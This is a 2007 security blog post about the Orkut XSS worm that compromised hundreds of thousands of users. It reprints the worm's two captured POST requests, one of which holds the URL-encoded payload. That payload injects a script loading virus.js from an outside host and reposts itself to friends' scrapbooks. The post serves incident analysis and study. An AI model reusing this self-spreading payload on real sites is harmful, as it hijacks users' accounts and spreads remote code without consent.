Cenzic 232 Patent
Paid Advertising
web application security lab

Orkut XSS Worm

Several people sent this to me over the last few days but for those of you who hadn’t seen it in the myriad of different places it showed up, Orkut was hacked using a XSS worm. Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

Rough estimates are north of 300,000 people compromised, even though it was caught relatively quickly. It’s amazing how fast these things grow in environments like that, where the medium for spreading is based on a technology that almost everyone uses and works across platform. I think the only thing stopping this from being more virulent is making it cross platform, and making the social engineering a little more seamless.

Here are the POST requests sent in by Lavakumar:

POST request sent by the worm to add the victim to the “Infectados pelo Vírus do Orkut” community. The community id is “44001818″.

POST /CommunityJoin.aspx?cmm=44001818 HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=<-xxxxxxxxxxxxxxxxxxxx->
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 98

POST_TOKEN=0B57493EBE09C74A3D69298F67635479&signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&Action.join

——————————————————————————————————————————————————

POST request sent by the worm to submit itself to the scrapbook of the victim’s friends.

POST /Scrapbook.aspx HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=-xxxxxxxxx-
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 146

Action.submit=1&POST_TOKEN=0B57493EBE09C74A3D69298F67635479&scrapText=2008%20vem%20ai…%20que%20ele%20comece%20mto%20bem%20para%20vc%3Cbr%2F%3E%5Bsilver%5DRL%20Wed%20Dec%2019%202007%2009%3A52%3A21%20GMT%2B0530%20(India%20Standard%20Time)%5B%2Fsilver%5D%3Cbr%2F%3E%3Cembed%20src%3D%22http%3A%2F%2Fwww.orkut.com%2FLoL.aspx%22%20type%3D%22application%2Fx-shockwave-flash%22%20wmode%3D%22transparent’)%3B%20script%3Ddocument.createElement(’script’)%3Bscript.src%3D’http%3A%2F%2Ffiles.myopera.com%2Fvirusdoorkut%2Ffiles%2Fvirus.js’%3Bdocument.getElementsByTagName(’head’)%5B0%5D.appendChild(script)%3Bescape(’%22%20%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fembed%3E&signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&toUserId=14668216

And the code can be found in many places around the net, but I also threw up a copy on the sla.ckers.org XSS worm section for anyone looking for example worm code. I’m trying to keep that section up to date with non-theoretical, but practical and real world worm code so we can all see it. Google has fixed this issue, but it is unclear what the fallout of the damage will be.

One Response to “Orkut XSS Worm”

  1. Kishor Says:

    Yeah. That worm did affect my scrapbook and sent scraps on my behalf to my friends.

    It also added you to a community named “Infectados pelo Vírus do Orkut”.

    Number of members on that community as of today is 543,355. So considering people who unjoined it, the number of people affected was > 543,355.

    I have found another issue related to privacy that can really be an issue on many sites.
    http://wasjournal.blogspot.com/2007/12/orkut-private-videos-are-not-private.html